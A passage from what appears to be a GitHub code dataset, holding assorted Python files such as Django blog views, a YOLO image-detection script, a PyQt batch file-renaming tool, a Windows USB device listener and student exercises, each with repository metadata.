twurl.augment(TWITTER_URL,\n {'screen_name': account, 'count': '20'})\n print('Retrieving account', account)\n\n try:\n connection = urllib.request.urlopen(url)\n except Exception as err:\n print('Failed to Retrieve', err)\n continue\n\n data = connection.read().decode()\n headers = dict(connection.getheaders())\n\n print('Remaining', headers['x-rate-limit-remaining'])\n\n try:\n js = json.loads(data)\n except:\n print('Unable to parse json')\n print(data)\n continue\n\n if 'users' not in js:\n print('Wrong type of json')\n print(json.dumps(js, indent=4))\n continue\n\n cur.execute('update People set retrieved=true where id=?', (ID, ))\n\n oldCount = 0\n newCount = 0\n for user in js['users']:\n name = user['screen_name']\n print('Found', name)\n cur.execute('select id from People where name=?', (name, ))\n \n try:\n friend_id = cur.fetchone()[0]\n oldCount += 1\n except:\n cur.execute('insert or fail into People (name, retrieved) values (?, false)', (name, ))\n friend_id = cur.lastrowid\n newCount += 1\n\n cur.execute('insert or ignore into Relations (from_id, to_id) values (?, ?)', (ID, friend_id))\n\n print('New Accounts = ', newCount, ', Revisited = ', oldCount, sep='')\n conn.commit()\n\ncur.close()\n\n","repo_name":"AhmedYasser5/Twitter_Friends_Network","sub_path":"twitter_db.py","file_name":"twitter_db.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12593723660","text":"# Name - Gurdip Singh SID - 22107007\r\n\r\n# Ques 1\r\ndef is_perfect_number(number):\r\n if number <=0:\r\n return False\r\n divisors_sum = sum(i for i in range(1,number) if number%i==0)\r\n if divisors_sum == number:\r\n print(\"It is Perfect No\")\r\n else:\r\n print(\"It is not a Perfect No\")\r\n\r\na = int(input())\r\nis_perfect_number(a)\r\n\r\n\r\n\r\n# Ques 2\r\na =input()\r\nb =a[::-1]\r\nif a == b:\r\n print(\"Yes\")\r\nelse:\r\n print(\"No\")\r\n\r\n\r\n\r\n# Ques 3\r\ndef print_pascals_triangle(n):\r\n triangle = []\r\n for i in range(n):\r\n row = [1]\r\n if i > 0:\r\n prev_row = triangle[i - 1]\r\n for j in range(len(prev_row) - 1):\r\n row.append(prev_row[j] + prev_row[j + 1])\r\n row.append(1)\r\n triangle.append(row)\r\n\r\n max_width = len(str(triangle[-1][len(triangle[-1]) // 2])) + 1\r\n\r\n for i in range(n):\r\n row = triangle[i]\r\n padding = ' ' * ((n - i - 1) * max_width // 2)\r\n line = ' ' * (max_width // 2)\r\n for num in row:\r\n line += str(num).center(max_width)\r\n print(padding + line)\r\n\r\nprint_pascals_triangle(5)\r\n\r\n\r\n\r\n# Ques 4\r\na = input()\r\nb = ['a','b','c','d','e','f','g','h','i','j','k','l','m','o','n','p','q','r','s','t','u','v','w','x','y','z',' ']\r\nc = []\r\n\r\nfor i in a.lower():\r\n if i not in c:\r\n c.append(i)\r\n\r\nif sorted(b)==sorted(c):\r\n print('yes')\r\nelse:\r\n print(\"no\")\r\n\r\n\r\n\r\n# Ques 5\r\nstr1 = input()\r\nlist = str1.split(\"-\")\r\nlis = sorted(list)\r\nstr2 = \"-\".join(lis)\r\nprint(str2)\r\n\r\n\r\n\r\n# Ques 6\r\ndef student_data(name,student_id,student_class ):\r\n print(f'student name is {name},SID is {student_id}, class is {student_class}')\r\n\r\nname = input()\r\nsid = input()\r\nclass_ =input()\r\n\r\n\r\nstudent_data(name,sid,class_)\r\n\r\n\r\n\r\n# Ques 7\r\nclass Student:\r\n pass\r\nclass Marks:\r\n pass\r\nstudent1 = Student()\r\nstudent2 = Student()\r\nmarks1 = Marks()\r\nmarks2 = Marks()\r\n\r\nprint(isinstance(student1, Student))\r\nprint(isinstance(student2, Student))\r\nprint(isinstance(marks1, Marks))\r\nprint(isinstance(marks2, Marks))\r\n\r\nprint(issubclass(Student, object))\r\nprint(issubclass(Marks, object))\r\n\r\n\r\n\r\n# Ques 8\r\ndef find_triplets(nums):\r\n nums.sort() # Sort the input list in ascending order\r\n triplets = []\r\n\r\n for i in range(len(nums) - 2):\r\n if i > 0 and nums[i] == nums[i - 1]:\r\n continue # Skip duplicate elements\r\n\r\n left = i + 1\r\n right = len(nums) - 1\r\n\r\n while left < right:\r\n total = nums[i] + nums[left] + nums[right]\r\n\r\n if total == 0:\r\n triplets.append([nums[i], nums[left], nums[right]])\r\n\r\n # Skip duplicate elements\r\n while left < right and nums[left] == nums[left + 1]:\r\n left += 1\r\n while left < right and nums[right] == nums[right - 1]:\r\n right -= 1\r\n\r\n left += 1\r\n right -= 1\r\n\r\n elif total < 0:\r\n left += 1\r\n else:\r\n right -= 1\r\n\r\n return triplets\r\n\r\nnums = [-25, -10, -7, -3, 2, 4, 8, 10]\r\ntriplets = find_triplets(nums)\r\nprint(triplets)\r\n\r\n\r\n\r\n# Ques 9\r\nclass ParenthesesValidator:\r\n def isValid(self, str):\r\n mapping = {'(': ')', '[': ']', '{': '}'}\r\n lis = []\r\n for idx in str:\r\n if idx in '([{':\r\n lis.append(idx)\r\n elif len(lis) == 0 or idx != mapping[lis.pop()]:\r\n return False\r\n return len(lis) == 0\r\nobj = ParenthesesValidator()\r\nprint(obj.isValid(\"([}])\"))","repo_name":"Gurdip-Singh10/Gurdip-Singh-ITC-Assignments","sub_path":"Assignment 6.py","file_name":"Assignment 6.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13485800434","text":"from django.shortcuts import render\nfrom .models import Post, Category\nfrom .forms import CommentForm\n\n# Create your views here.\n\n\ndef blog_index(request):\n posts = Post.objects.all().order_by('-created_on')\n context = {\n 'posts': posts\n }\n return render(request, 'blog_index.html', context)\n\n\ndef blog_detail(request, pk):\n post = Post.objects.get(pk=pk)\n comment_form = None\n comments = post.comments.filter()\n\n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.save()\n else:\n comment_form = CommentForm()\n context = {\n 'post': post,\n 'comments': comments,\n 'comment_form': comment_form\n }\n return render(request, 'blog_details.html', context)\n\n\ndef blog_category(request):\n categories = Category.objects.all()\n context = {\n 'categories': categories\n }\n return render(request, 'blog_category.html', context)\n\n\n# def category_detail(request, pk):\n# category = Category.object.get(pk=pk)\n# context = {\n# 'category' : category\n# }\n# return render(request, 'category_details.html', context)\n\n","repo_name":"RdBear324/my_Django","sub_path":"Artem_2022/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30588699384","text":"import time\nimport win32gui, win32con, win32api\nimport win32gui_struct\n\nfrom autorefresh.autorefresh_thread import AutorefreshThread\n\n\nGUID_DEVINTERFACE_USB_DEVICE = \"{A5DCBF10-6530-11D2-901F-00C04FB951ED}\"\nDEVICE_NOTIFY_ALL_INTERFACE_CLASSES = 4\n\ng_device_changes = 0\n\n\ndef device_changed(hwnd, msg, wp, lp):\n global g_device_changes\n if wp in [win32con.DBT_DEVICEARRIVAL, win32con.DBT_DEVICEREMOVECOMPLETE]:\n g_device_changes += 1\n\n\nclass AutorefreshThreadWin(AutorefreshThread):\n\n def run(self):\n global g_device_changes\n\n # code based on:\n # - https://github.com/libsdl-org/SDL/blob/7b3449b89f0625e4603f5d8681e2bac1f51a9386/src/hidapi/SDL_hidapi.c\n # - https://github.com/vmware-archive/salt-windows-install/blob/master/deps/salt/python/App/Lib/site-packages/win32/Demos/win32gui_devicenotify.py\n wc = win32gui.WNDCLASS()\n wc.hInstance = win32api.GetModuleHandle(None)\n wc.lpszClassName = \"VIAL_DEVICE_DETECTION\"\n wc.lpfnWndProc = { win32con.WM_DEVICECHANGE: device_changed }\n class_atom = win32gui.RegisterClass(wc)\n hwnd = win32gui.CreateWindowEx(0, \"VIAL_DEVICE_DETECTION\", None, 0, 0, 0, 0, 0, win32con.HWND_MESSAGE, None, None, None)\n\n hdev = win32gui.RegisterDeviceNotification(\n hwnd,\n win32gui_struct.PackDEV_BROADCAST_DEVICEINTERFACE(GUID_DEVINTERFACE_USB_DEVICE),\n win32con.DEVICE_NOTIFY_WINDOW_HANDLE | DEVICE_NOTIFY_ALL_INTERFACE_CLASSES\n )\n\n while True:\n for x in range(100):\n win32gui.PumpWaitingMessages()\n time.sleep(0.01)\n\n if g_device_changes > 0:\n g_device_changes = 0\n self.update()\n","repo_name":"vial-kb/vial-gui","sub_path":"src/main/python/autorefresh/autorefresh_thread_win.py","file_name":"autorefresh_thread_win.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":733,"dataset":"github-code","pt":"7"} +{"seq_id":"23628794990","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n NoticeCreateAPIView,\n NoticeListAPIView,\n NoticeDetailAPIView,\n NoticeUpdateAPIView,\n NoticeDeleteAPIView,\n\t)\n\nurlpatterns = [\n url(r'^$', NoticeListAPIView.as_view(), name='notices'),\n url(r'^(?P[\\d]+)/$', NoticeDetailAPIView.as_view(), name='detail'),\n url(r'^(?P[\\d]+)/delete/$', NoticeDeleteAPIView.as_view(), name=\"delete\"),\n url(r'^(?P[\\d]+)/edit/$', NoticeUpdateAPIView.as_view(), name='update'),\n url(r'^create/$', NoticeCreateAPIView.as_view(), name=\"addnotice\"),\n]","repo_name":"lyoman/uzapp_backend","sub_path":"notices/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17808786364","text":"#import h5py\nimport cv2\nimport numpy as np\nimport pickle\nimport math\nfrom glob import iglob\n\nRESOURCE_PATH = \"res/\"\n# save and load pickle objects \ndef save_obj(obj, name):\n with open(RESOURCE_PATH + name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\t\t\ndef load_obj(name):\n with open(RESOURCE_PATH + name + '.pkl', 'rb') as f:\n return pickle.load(f)\t\t\n\n# create grayscale image from database image\ndef gray( img ):\n\treturn cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\ndef load_images(filename = None, hdf5 = False):\n\t# if hdf5: #LLD-icon.hdf5\n\t# \thdf5_file = h5py.File(RESOURCE_PATH + filename, 'r')\n\t# \timages, labels = (hdf5_file['data'], hdf5_file['labels/resnet/rc_64'])\n\t# \treturn images\n\treturn [i for i in map(cv2.imread, iglob(RESOURCE_PATH+filename+'/**/*', recursive=True)) if i is not None]\n\n# find max distance given a list of points \ndef find_max( point_list):\n\n\tmax_dist = 0.000\n\tfirst_point = point_list[0]\n\tsecond_point = point_list[1]\n\n\tfor i in range(0, len(point_list)-1):\n\t\tfor j in range(i+1, len(point_list)):\n\t\t\t\n\t\t\tdist_sq = (point_list[i][0] - point_list[j][0])**2 + (point_list[i][1] - point_list[j][1])**2 \n\t\t\t\n\t\t\tif dist_sq > max_dist:\n\t\t\t\tmax_dist = dist_sq\n\t\t\t\tfirst_point = point_list[i]\n\t\t\t\tsecond_point = point_list[j]\n\t\t\t\t\n\treturn first_point, second_point, math.sqrt(max_dist)\n\t\n# if object is a circle, find max distance which also has the closest slope to the best fit slope \ndef find_tiebreaker( x, y, best_slope, max_dist ):\n\n\tfirst_point = (x[0], y[0])\n\tsecond_point = (x[1], y[1])\n\tmin_slope_diff = 999999.999\n\t\n\tfor i in range(0, len(x)-1):\n\t\tfor j in range(i+1,len(x)+i):\n\t\t\n\t\t\tif j >= len(x):\n\t\t\t\tj = j % len(x)\n\t\t\t\n\t\t\tdist = math.sqrt( (x[i] - x[j])**2 + (y[i] - y[j])**2 )\n\t\t\tif (max_dist - dist)/max_dist <= 0.08 and (x[i] - x[j]) != 0 :\n\t\t\t\tslope_diff = abs( (y[i] - y[j])/(x[i] - x[j]) - best_slope )\n\t\t\t\t\n\t\t\t\tif slope_diff < min_slope_diff:\n\t\t\t\t\tmin_slope_diff = slope_diff\n\t\t\t\t\tfirst_point = (x[i], y[i])\n\t\t\t\t\tsecond_point = (x[j], y[j])\t\n\n\treturn first_point, second_point\n\t\n\n# find midpoints between two points given a set of fractions \ndef get_midway (p1, p2, fractions):\n\t\n\tmidpts = []\n\tdx = p2[0] - p1[0]\n\tdy = p2[1] - p1[1]\n\t\n\tfor n, fract in enumerate(fractions):\n\t\tx = p1[0] + fract * dx \n\t\ty = p1[1] + fract * dy \n\t\tmidpts.append( (x,y) )\n\t\t\t\n\treturn midpts\n\n# find intersection of 2 lines \t\ndef line_intersect(line1, line2):\n\txdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])\n\tydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1]) \n\t\n\tdef det(a, b):\n\t\treturn a[0] * b[1] - a[1] * b[0]\n\t\n\tdiv = det(xdiff, ydiff)\n\tif div == 0:\n\t\treturn (-999999,-999999) \n\n\td = (det(*line1), det(*line2))\n\tx = det(d, xdiff) / div\n\ty = det(d, ydiff) / div\n\treturn x, y\t\n\t\n# find points of intersection between normal line and all possible line segments in contour \ndef find_intersect( x1, y1, x2, y2):\n\t\n\tintersect = []\n\t\n\tfor i in range(0,len(x2)):\n\t\tj = i + 1\n\t\tif j == len(x2):\n\t\t\tj = 0\n\t\t\n\t\t# find point of intersection\n\t\tpoint = line_intersect( ((x1[0], y1[0]), (x1[-1], y1[-1])), ((x2[i], y2[i]), (x2[j], y2[j])) )\n\t\t\n\t\t# check that the point lies on the contour \n\t\tdotproduct = (point[0] - x2[i]) * (x2[j] - x2[i]) + (point[1] - y2[i])*(y2[j] - y2[i])\n\t\tsquaredlength = (x2[j] - x2[i])**2 + (y2[j] - y2[i])**2\n\t\t\n\t\tif dotproduct >= 0 and dotproduct <= squaredlength and point not in intersect:\n\t\t\tintersect.append( point )\n\n\treturn intersect\n\ndef canny(img):\n\tcimg = cv2.Canny(img,100,200)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,20,100)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,5,20)\n\tif np.amax(cimg,axis=(0,1)) == 0:\n\t\tcimg = cv2.Canny(img,1,5)\t\n\treturn cimg\n\ndef fill_in_diagonals(img):\n\trows,cols = img.shape[:2]\n\tmin_x = cols \n\tmin_y = rows\n\tmax_x = 0 \n\tmax_y = 0 \n\t# fill in any diagonals in the edges \n\tfor i in range(0, rows):\n\t\tfor j in range(0, cols):\n\t\t\tif i >= 1 and i <= rows - 2 and j >= 1 and j <= cols - 2: \n\t\t\t\tif img[i,j] == 255 and img[i,j-1] == 0 and img[i+1,j] == 0 and img[i+1,j-1] == 255:\n\t\t\t\t\timg[i+1,j] = 255 \n\t\t\t\telif img[i,j] == 255 and img[i,j+1] == 0 and img[i+1,j] == 0 and img[i+1,j+1] == 255:\n\t\t\t\t\timg[i+1,j] = 255 \n\t\t\t\n\t\t\tif img[i,j] == 255:\n\t\t\t\tif j > max_x:\n\t\t\t\t\tmax_x = j \n\t\t\t\tif j < min_x:\n\t\t\t\t\tmin_x = j\n\t\t\t\tif i > max_y:\n\t\t\t\t\tmax_y = i \n\t\t\t\tif i < min_y: \n\t\t\t\t\tmin_y = i\n\treturn img, rows, cols, min_x, min_y, max_x, max_y\n\ndef image_preprocess(img):\n\timg = gray(img)\n\trows,cols = img.shape[:2]\n\t# create grayscale image and use Canny edge detection\n\tcimg = canny(img)\t\n\t\n\tdcimg, rows, cols, min_x, min_y, max_x, max_y = fill_in_diagonals(cimg)\n\t\n\treturn rows, cols, min_x, min_y, max_x, max_y, dcimg","repo_name":"kac123/Icon-Matching-Project","sub_path":"gcloudtest/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14386073351","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\nfrom django.conf import settings\n\nrouter = routers.DefaultRouter()\nrouter.register(r'rivers', views.RiverViewSet)\nrouter.register(r'data',views.DataViewSet)\nrouter.register(r'insect',views.InsectViewSet)\nrouter.register(r'samplerecord',views.SampleRecordViewSet)\nrouter.register(r'recordinsect',views.SampleRecordInsectViewSet)\n#Application Name\n\napp_name = 'aquality_server'\n# Controlling The Path of Application\n\nuseraccount = [\n path('useraccount/loginauth', views.checkUser, name='checkUser'),\n path('useraccount/register', views.registerPage, name='registerPage'),\n path('useraccount/delete', views.del_user, name='del_user'),\n path('useraccount/checkname', views.if_username_exist, name='checkName'),\n path('useraccount/checkemail', views.if_email_exist, name='checkEmail'),\n path('insect_score/score', views.calculate_score_insect, name='get_score'),\n]\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n # path('addData', views.addData, name='addData'),\n path('testing/',views.testingPage,name='testingPage'),\n path('testingInsect/',views.testingInsectPage,name='testingInsectPage'),\n path('testingPageForPatrick',views.testingPageForPatrick,name='testingPageForPatrick'),\n path('sampledetail',views.getSampleRecord,name='sampledetail'),\n path('samplesave',views.storeRecordResult,name='samplesave')\n] + useraccount\n","repo_name":"tunjing998/CCCMI-TCA2","sub_path":"Aquality_Two_Backend_Server/aquality_server/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10183236327","text":"import os\r\nimport time\r\nimport cv2\r\nimport numpy as np \r\n\r\ndef process_image(img) :\r\n\r\n image_org = cv2.resize(img , (416,416), interpolation = cv2.INTER_CUBIC)\r\n image_org = np.array(image_org , dtype = 'float32')\r\n image_org = image_org/255.0\r\n image_org = np.expand_dims(image_org , axis=0)\r\n\r\n return image_org\r\n\r\ndef get_classes(file) :\r\n with open(file) as f:\r\n name_of_class = f.readlines()\r\n\r\n name_of_class = [ class_name.strip() for class_name in name_of_class ]\r\n\r\n return name_of_class\r\n\r\ndef box_draw(image, boxes, scores, classes, all_classes):\r\n\r\n for box, score, cl in zip(boxes, scores, classes):\r\n x, y, w, h = box\r\n\r\n top = max(0, np.floor(x + 0.5).astype(int))\r\n left = max(0, np.floor(y + 0.5).astype(int))\r\n right = min(image.shape[1], np.floor(x + w + 0.5).astype(int))\r\n bottom = min(image.shape[0], np.floor(y + h + 0.5).astype(int))\r\n\r\n cv2.rectangle(image, (top, left), (right, bottom), (255, 0, 0), 2)\r\n cv2.putText(image, '{0} {1:.2f}'.format(all_classes[cl], score),\r\n (top, left - 6),\r\n cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.6, (0, 0, 255), 1,\r\n cv2.LINE_AA)\r\n\r\n print('class: {0}, score: {1:.2f}'.format(all_classes[cl], score))\r\n print('box coordinate x,y,w,h: {0}'.format(box))\r\n\r\n print()\r\n\r\n\r\ndef detect_image(image, yolo, all_classes) : \r\n \"\"\" image : 오리지날 이미지\r\n yolo : 욜로 모델\r\n all_classes : 전체 클래스 이름.\r\n\r\n 변환된 이미지 리턴! \"\"\"\r\n\r\n pimage = process_image(image)\r\n\r\n image_boxes , image_classes , image_scores = yolo.predict(pimage,image.shape)\r\n\r\n if image_boxes is not None :\r\n box_draw(image, image_boxes , image_scores, image_classes, all_classes)\r\n\r\n \r\n return image\r\n\r\n\r\n##욜로 모델 import 하기\r\nfrom yolo.model.yolo_model import YOLO\r\n\r\n##욜로 모델 만들기\r\nyolo = YOLO(0.3, 0.7)\r\n\r\nall_classes = get_classes('yolo/data/coco_classes.txt')\r\n\r\nimage = cv2.imread('yolo/images/test/people.JPG')\r\n\r\nresult = detect_image(image, yolo , all_classes)\r\n\r\ncv2.imshow(\"result\", result)\r\ncv2.imwrite('0.3, 0.7.jpg', result)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"rightbin/streamlit-od","sub_path":"yolo_detection.py","file_name":"yolo_detection.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3955017457","text":"from rest_framework.serializers import ModelSerializer\nfrom rest_framework.serializers import SerializerMethodField\nfrom django.utils import dateformat\n\nfrom api.models import Post\n\n\n# help understading vote_score\n# https://django.cowhite.com/blog/dynamic-fields-in-django-rest-framwork-serializers/\nclass PostSerializer(ModelSerializer):\n vote_score = SerializerMethodField(method_name='calculate_vote_score')\n uploaded_date = SerializerMethodField(method_name='calculate_date_time')\n\n class Meta:\n model = Post\n fields = (\n 'id',\n 'boast_or_roast',\n 'content',\n 'upvotes',\n 'downvotes',\n 'vote_score',\n 'uploaded_date'\n )\n\n def calculate_vote_score(self, instance):\n return (instance.upvotes - instance.downvotes)\n\n def calculate_date_time(self, instance):\n return (dateformat.format(instance.upload_date, 'g:i A M d,Y'))\n # return instance.upload_date\n\n\nclass UpvoteSerializer(ModelSerializer):\n class Meta:\n model = Post\n fields = (\n 'upvotes',\n )\n\n\nclass DownvoteSerializer(ModelSerializer):\n class Meta:\n model = Post\n fields = (\n 'downvotes',\n )\n","repo_name":"jsinghw/GhostPost_Backend","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41999762630","text":"from PyQt5.Qt import Qt\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtGui import QIcon, QPixmap, QDesktopServices\nfrom PyQt5.QtWidgets import QWidget, QApplication, QFileDialog, QMessageBox\nimport os\n\nfrom resource.batchFilesRename_ui import Ui_Main\n\n\nclass PaneBatchFilesRename(QWidget, Ui_Main):\n def __init__(self, parent=None, *args, **kwargs):\n super(PaneBatchFilesRename, self).__init__(parent, *args, **kwargs)\n # 初始化数据\n self.files_name = []\n self.new_files_name = []\n self.files_directory = ''\n\n self.setAttribute(Qt.WA_StyledBackground, True)\n self.setupUi(self)\n\n # 信号\n # 槽函数\n # 添加目标路径\n def add_files_path(self):\n # 使用前先清空展示文件列表\n self.files_list_text_edit.clear()\n self.files_name.clear()\n self.new_files_name.clear()\n # 获取路径\n files_directory = QFileDialog.getExistingDirectory(self, '选择一个py文件', './')\n self.files_directory = files_directory\n # 展示路径\n self.directory_line_edit.setText(files_directory)\n # 根据路径获取文件\n self.files_name = [files_directory + os.sep + name for name in os.listdir(files_directory) if\n os.path.isfile(files_directory + os.sep + name)]\n # 展示文件列表\n for name in self.files_name:\n self.files_list_text_edit.appendPlainText(name)\n\n # 预览处理结果\n def preview_files_list(self):\n # 判断选中的文件夹中是否有文件\n if len(self.files_name) == 0:\n message_box = QMessageBox(self)\n message_box.setWindowIcon(QIcon(':/main/images/message-exclamatory-mark.PNG'))\n message_box.setIcon(QMessageBox.Information)\n message_box.setWindowTitle('注意:')\n message_box.setText('

当前文件夹下不存在文件,请从新添加

')\n message_box.setDetailedText('当前文件夹下不存在文件,请从新添加')\n message_box.show()\n return None\n # 获取重命名方式\n if self.default_radio_button.isChecked():\n # 默认\n # 获取文件列表\n for i, element in enumerate(self.files_name):\n new_file_name = self.files_directory + os.sep + str(i+1) + os.path.splitext(element)[-1]\n self.new_files_name.append(new_file_name)\n self.files_list_preview_text_edit.appendPlainText(new_file_name)\n return None\n if self.custom_radio_button.isChecked():\n # 自定义\n QMessageBox.warning(self, '警告!', '

该功能还未实现,敬请期待!

', QMessageBox.Cancel | QMessageBox.Cancel)\n return None\n\n # 执行重命名\n def apply(self):\n if len(self.files_name) == 0 or len(self.new_files_name)==0:\n message_box = QMessageBox(self)\n message_box.setWindowIcon(QIcon(':/main/images/message-exclamatory-mark.PNG'))\n message_box.setIcon(QMessageBox.Information)\n message_box.setWindowTitle('注意:')\n message_box.setText('

请先执行预览功能,然后应用

')\n message_box.setDetailedText('请先执行预览功能,然后应用')\n message_box.show()\n return None\n # 执行重命名\n # 二次警告\n msg = QMessageBox.warning(self, '警告!', '

确认执行重命名!

', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if msg == QMessageBox.No:\n return None\n # 获取重命名方式\n if self.default_radio_button.isChecked():\n # 默认\n if len(self.files_name) == len(self.new_files_name):\n for i in range(0,len(self.files_name)):\n os.rename(self.files_name[i], self.new_files_name[i])\n self.rename_progressBar.setValue(int((100/len(self.files_name))*(i+1)))\n self.files_list_preview_text_edit.appendPlainText('执行完成!')\n if self.custom_radio_button.isChecked():\n # 自定义\n QMessageBox.warning(self, '警告!', '

该功能还未实现,敬请期待!

', QMessageBox.Cancel | QMessageBox.Cancel)\n return None\n\n # 关于\n def about(self):\n # 关于\n QMessageBox.about(self, '批量重命名工具', '

批量重命名工具!点击确定查看源代码

')\n QDesktopServices.openUrl(QUrl('https://github.com/nalipiaoxiang/BatchFilesRename'))\n\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n paneBatchFilesRename = PaneBatchFilesRename()\n paneBatchFilesRename.show()\n sys.exit(app.exec_())\n","repo_name":"nalipiaoxiang/BatchFilesRename","sub_path":"application/Pane_BatchFilesRename.py","file_name":"Pane_BatchFilesRename.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"43216543837","text":"from Conta import Conta\r\n\r\nclass ContaCorrente(Conta):\r\n def __init__(self, id_conta: str, saldo: float, limite_da_conta: float):\r\n super().__init__(id_conta, saldo)\r\n\r\n if not isinstance(limite_da_conta, float):\r\n raise TypeError(\"O limite da conta deve ser do tipo float.\")\r\n \r\n self.limite_da_conta: float = limite_da_conta\r\n\r\n def get_limite_da_conta(self):\r\n return self.limite_da_conta\r\n \r\n # O novo limite deve ser do tipo float e maior que zero.\r\n def set_limite_da_conta(self, novo_limite):\r\n if not isinstance(novo_limite, float):\r\n raise TypeError(\"O novo limite deve ser do tipo float.\")\r\n if novo_limite < 0:\r\n raise ValueError(\"O novo limite deve ser não negativo.\")\r\n self.limite_da_conta = novo_limite\r\n \r\n # Os valores de depósito dever ser do tipo float e maiores que zero.\r\n def depositar(self, valor_de_deposito):\r\n if not isinstance(valor_de_deposito, float):\r\n raise TypeError(\"O valor do depósito deve ser do tipo float.\")\r\n if valor_de_deposito <= 0:\r\n raise ValueError(\"Valor de deposito inválido. Deve ser maior que zero.\")\r\n self.set_saldo(self.get_saldo() + valor_de_deposito)\r\n print(f\"Depósito no valor de R${valor_de_deposito:.2f} realizado com sucesso.\")\r\n print(f\"Saldo atual: R${self.get_saldo():.2f}\")\r\n\r\n # Os valores de saque devem ser do tipo float, maiores que zero e menores ou iguais ao saldo mais o limite da conta.\r\n def sacar(self, valor_de_saque):\r\n if not isinstance(valor_de_saque, float):\r\n raise TypeError(\"O valor do saque deve ser do tipo float.\")\r\n if valor_de_saque <= 0:\r\n raise ValueError(\"Valor de saque inválido. Deve ser maior que zero.\")\r\n if self.get_saldo() + self.get_limite_da_conta() < valor_de_saque:\r\n raise ValueError(\"Saldo insuficiente para realizar o saque.\")\r\n self.set_saldo(self.get_saldo() - valor_de_saque)\r\n print(f\"Depósito no valor de R${valor_de_saque:.2f} realizado com sucesso.\")\r\n print(f\"Saldo atual: R${self.get_saldo():.2f}\")\r\n\r\n","repo_name":"LucasSenosC/Atividade_Final-SOLID","sub_path":"ContaCorrente.py","file_name":"ContaCorrente.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71842837984","text":"from flask import jsonify\nfrom sqlalchemy.sql import text\nfrom SuqeBeEja import engine\n\n\ndef displaySalesPersonAccount(salesperson_id):\n s_id = {\"id\": salesperson_id}\n displaySellerStatement = text(\n \"\"\"\n SELECT * FROM sellerTable WHERE seller_id = :id\n \"\"\"\n )\n\n with engine.connect() as con:\n result = con.execute(displaySellerStatement, **s_id)\n return jsonify({'Salesperson': [dict(row) for row in result]})\n\n\ndef displayCustomerAccount(customer_id):\n c_id = {\"id\": customer_id}\n displayCustomerStatement = text(\n \"\"\"\n SELECT * FROM customerTable \n \"\"\"\n )\n\n with engine.connect() as con:\n result = con.execute(displayCustomerStatement)\n return jsonify({'Customer': [dict(row) for row in result]})\n","repo_name":"EshtaolGirma/SuqeBeEjeAPI","sub_path":"SuqeBeEja/service/displayAccount.py","file_name":"displayAccount.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26468033553","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\nif __name__ == '__main__':\n\titers = []\t\n\tall_loss = []\n\tall_loss_bbox = []\n\tall_loss_mask = []\n\tall_accuracy_cls = []\n\tall_time = []\n\tall_lr =[]\n\n\tlog_file = './log/20181103.log'\n\n\twith open(log_file) as f:\n\t\tfor line in f:\n\t\t\tif \".yaml\" in line:\n\t\t\t\tbackbone = line.split('.yaml')[0].split('/')[-1]\n\t\t\t\tbreak\n\t\tfor line in f:\n\t\t\tif \"json_stats\" not in line:\n\t\t\t\tcontinue\n\t\t\taccuracy_cls = line.split(\"\\\"accuracy_cls\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\titeration = line.split(\"\\\"iter\\\": \")[1].split(\",\")[0]\n\t\t\tloss = line.split(\"\\\"loss\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\tloss_bbox = line.split(\"\\\"loss_bbox\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\tloss_mask = line.split(\"\\\"loss_mask\\\": \\\"\")[1].split(\"\\\"\")[0]\n\t\t\ttime = line.split(\"\\\"time\\\": 